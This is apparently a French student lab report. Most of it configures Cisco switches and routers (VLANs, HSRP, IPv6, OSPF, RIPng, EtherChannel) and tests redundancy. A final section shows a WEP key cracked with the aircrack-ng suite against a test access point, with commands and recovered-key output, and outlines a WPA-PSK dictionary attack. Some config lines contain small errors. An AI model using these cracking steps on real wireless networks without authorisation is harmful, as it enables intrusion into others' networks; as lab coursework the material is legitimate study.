       ip address 100.200.5.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.5.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BC::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BC::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 7 
       ip address 100.200.6.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.6.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BD::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BD::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                               
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
   interface vlan 8 
       ip address 193.48.57.161 255.255.255.240         //IPV4
       standby 0 ip 193.48.57.174                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B8::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B8::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference High                   //Définition priorité pour la redondance                              
   exit
exit
configure terminal
   router ospf 1                                        //Pour l'échange de routes ipv4
       router-id 10.100.0.1
       log-adjacency-changes
       summary address 193.48.57.160 255.255.255.240
       redistribute connected subnets
       network 192.168.222.8 0.0.0.7 area 60
   exit
exit
configure terminal
    ipv6 router rip tpima2a5                            //Pour l'échange de routes ipv6
    redistribute connected metric1
    exit
exit

Spanning Tree :

spanning-tree mode pvst                                                         
spanning-tree etherchannel guard misconfig                                      
spanning-tree extend system-id     

Configuration des ports ethernet: La connexion avec le commutateur 4006 se fait par une liaison etherchannel de 8 câbles ethernet : GigabitEthernet0/1-15 (impairs)

interface TenGigabitEthernet0/2                         //Vers cordouan
       switchport mode access
       switchport access vlan131
   exit                                                                       
interface Port-channel1                                                         
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
!                                                                                                                                                    
interface GigabitEthernet0/1                                                          
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                            
interface GigabitEthernet0/3                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                            
interface GigabitEthernet0/5                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                             
interface GigabitEthernet0/7                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                           
interface GigabitEthernet0/9                                                    
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                           
interface GigabitEthernet0/11                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                         
interface GigabitEthernet0/13                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active
!                                                                                                                                
interface GigabitEthernet0/15                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
    channel-group 1 mode active                                                    
!                                                                                                                                                     
interface GigabitEthernet0/17                             //Vers le commutateur 6006                                                   
    switchport trunk encapsulation dot1q                                           
    switchport mode trunk                                                          
!

2. Routeur CISCO 4331

Avant tout, nous avons changé l'OS du routeur, en effet, la version isr4300-universalk9.03.13.04.S.154-3.S4-ext.SPA.bin ne prend pas en charge les Spanning Tree pour les mécanismes de redondance... Nous avons donc installé la version isr4300-universalk9.03.16.05.S.155-3.S5-ext.SPA.bin

configuration des vlans :

configure terminal
   interface BDI1
        ip address 10.100.0.2 255.255.255.0
        standby ip 10.100.0.254
   exit
   interface BDI131
       ip address 192.168.222.10 255.255.255.248        //IPV4 - pas besoin de HSRP
       ipv6 address fe80::3 link-local                  //IPV6
       ipv6 enable
       ipv6 rip tpima2a5 enable                         //Echange de routes IPV6
   exit
   interface BDI2
       ip address 100.200.1.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60B9::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B9::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI3
       ip address 100.200.2.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.2.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BA::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BA::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI4
       ip address 100.200.3.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.3.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BB::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BB::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI5
       ip address 100.200.4.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.4.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BC::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BC::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI6
       ip address 100.200.5.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.1.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BD::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BD::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI7
       ip address 100.200.6.2 255.255.255.000           //IPV4
       standby 0 ip 100.200.6.254                       //Déclaration adresse virtuelle par HSRP                              
       standby 0 preempt                                       
       ipv6 address 2001:660:4401:60BE::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60BE::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
   interface BDI8
       ip address 193.48.57.161 255.255.255.240         //IPV4
       standby ip 193.48.57.174                        //Déclaration adresse virtuelle par HSRP                              
       standby preempt                                       
       ipv6 address 2001:660:4401:60B8::/64 eui-64      //IPV6                              
       ipv6 enable                                                                    
       ipv6 nd prefix 2001:660:4401:60B8::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              
       ipv6 nd router-preference Low                    //Définition priorité pour la redondance                              
   exit
exit
configure terminal
   router ospf 1                                        //Pour l'échange de routes ipv4
       router-id 10.100.0.1
       log-adjacency-changes
       summary address 193.48.57.160 255.255.255.240
       redistribute connected subnets
       network 192.168.222.8 0.0.0.7 area 60
   exit
exit
configure terminal
    ipv6 router rip tpima2a5                            //Pour l'échange de routes ipv6
    redistribute connected metric1
    exit
exit          
ipv6 unicast rooting                                    //pour l'échange de routes IPV6 (RIP)                

Pour le spanning tree on tape donc :

spanning-tree mode pvst   
                              

configuration des ports :

interface GigabitEthernet0/0/0                          //Vers le Commutateur 6006
    no ip address
    negotiation auto
    media-type sfp
    service instance 1 ethernet
         encapsulation dot1q 1
         rewrite ingress tag pop 1 symmetric
         bridge-domain 1
    !
    service instance 2 ethernet
         encapsulation dot1q 2
         rewrite ingress tag pop 1 symmetric
         bridge-domain 2
    !
    service instance 3 ethernet
         encapsulation dot1q 3
         rewrite ingress tag pop 1 symmetric
         bridge-domain 3
    !
    service instance 4 ethernet
         encapsulation dot1q 4
         rewrite ingress tag pop 1 symmetric
         bridge-domain 4
    !
    service instance 5 ethernet
         encapsulation dot1q 5
         rewrite ingress tag pop 1 symmetric
         bridge-domain 5
    !
    service instance 6 ethernet
         encapsulation dot1q 6
         rewrite ingress tag pop 1 symmetric
         bridge-domain 6
    !
    service instance 7 ethernet
         encapsulation dot1q 7
         rewrite ingress tag pop 1 symmetric
         bridge-domain 7
    !
    service instance 8 ethernet
         encapsulation dot1q 8
         rewrite ingress tag pop 1 symmetric
         bridge-domain 8
    !
    service instance 131 ethernet
         encapsulation dot1q 131
         rewrite ingress tag pop 1 symmetric
         bridge-domain 131
    !
!
interface GigabitEthernet0/0/1                          //Vers le routeur de l'école
    no ip address
    negotiation auto
    service instance 131 ethernet
         encapsulation dot1q 131
         bridge-domain 131
    !
!
interface GigabitEthernet0/0/2                          //Vers le Commutateur 4006
    no ip address
    negotiation auto
    media-type sfp
    service instance 1 ethernet
         encapsulation dot1q 1
         rewrite ingress tag pop 1 symmetric
         bridge-domain 1
    !
    service instance 2 ethernet
         encapsulation dot1q 2
         rewrite ingress tag pop 1 symmetric
         bridge-domain 2
    !
    service instance 3 ethernet
         encapsulation dot1q 3
         rewrite ingress tag pop 1 symmetric
         bridge-domain 3
    !
    service instance 4 ethernet
         encapsulation dot1q 4
         rewrite ingress tag pop 1 symmetric
         bridge-domain 4
    !
    service instance 5 ethernet
         encapsulation dot1q 5
         rewrite ingress tag pop 1 symmetric
         bridge-domain 5
    !
    service instance 6 ethernet
         encapsulation dot1q 6
         rewrite ingress tag pop 1 symmetric
         bridge-domain 6
    !
    service instance 7 ethernet
         encapsulation dot1q 7
         rewrite ingress tag pop 1 symmetric
         bridge-domain 7
    !
    service instance 8 ethernet
         encapsulation dot1q 8
         rewrite ingress tag pop 1 symmetric
         bridge-domain 8
    !
    service instance 131 ethernet
         encapsulation dot1q 131
         rewrite ingress tag pop 1 symmetric
         bridge-domain 131
    !
!

3. Test de la redondance

Afin de tester le fonctionnement correct du réseau complet, nous avons testé le fonctionnement lorsque nous coupons un des 2 routeurs. Résultat : ping sur google toujours fonctionnel après l'arrêt indépendant de chaque routeur. Les différents binômes ont eu à changer l'adresse de la gateway vers l'adresse virtuelle 193.48.57.174 afin de toujours pouvoir accéder au réseau malgré la coupure d'un des routeurs.

IV) Cassage des clés WIFI

1. Clé WEP

Tout d'abord, il faut passer la carte WIFI en mode "promicious" :

airmon-ng start wlx40a5ef010eac // il était déjà activé

Ensuite, on liste tous les réseaux WIFI que l'on peut capter :

airodump-ng --encrypt wep wlx40a5ef010eac

On cible alors un réseau qui reçoit beaucoup de paquets, dans notre cas ce sera la BORNE_TEST2. Puis on récupère tous les paquets envoyés à cette borne par un des clients :

airodump-ng -w out -c 3 --essid BORNE_TEST2 wlx40a5ef010eac //en précisant le channel 3, sur lequel nous avons capté le plus de paquets.

Les paquets récupérés seront stockés dans un fichier nommé out1.cap à l'endroit où on lance cette commande. Enfin, on lance la commande suivante qui va trouver la clé WEP du réseau :

aircrack-ng out-01.pcap

On patiente un peu.. et on obtient :

                              Aircrack-ng 1.2 rc4
                [00:18:04] Tested 709 keys (got 55601 IVs)
  KB    depth   byte(vote)
   0    0/  1   63(82432) 2A(66048) 25(64256) A8(64000) 9D(63744)
   1    0/  2   32(79104) 09(66816) D7(64768) ED(64512) 7D(64256)
   2   68/  2   DD(58368) DC(58112) F6(58112) AE(57856) F2(57856)
   3    5/  7   08(64256) FC(63744) 5E(63488) CB(62720) 23(62464)
   4   21/  4   46(60672) 02(60160) 0E(60160) 73(60160) 7C(60160)
   KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )
    Decrypted correctly: 100%

Nous avons réussi à décrypter la clé WEP du réseau au bout de 75000 paquets interceptés et quelques minutes de patience !

2. Clé WPA-PSK

Nous n'avons pas eu le temps de tenter de casser la clé WPA-PSK. Il aurait fallu sensiblement la même démarche qu'avec le WEP, sauf que lors de l'écoute on aurait pu écouter que les conversations et non plus juste les paquets dans un seul sens. On aurait également dû fournir un dictionnaire de possibilité et limiter les recherches à une dizaine de caractères et seulement du numérique pour avoir une chance de trouver la clé..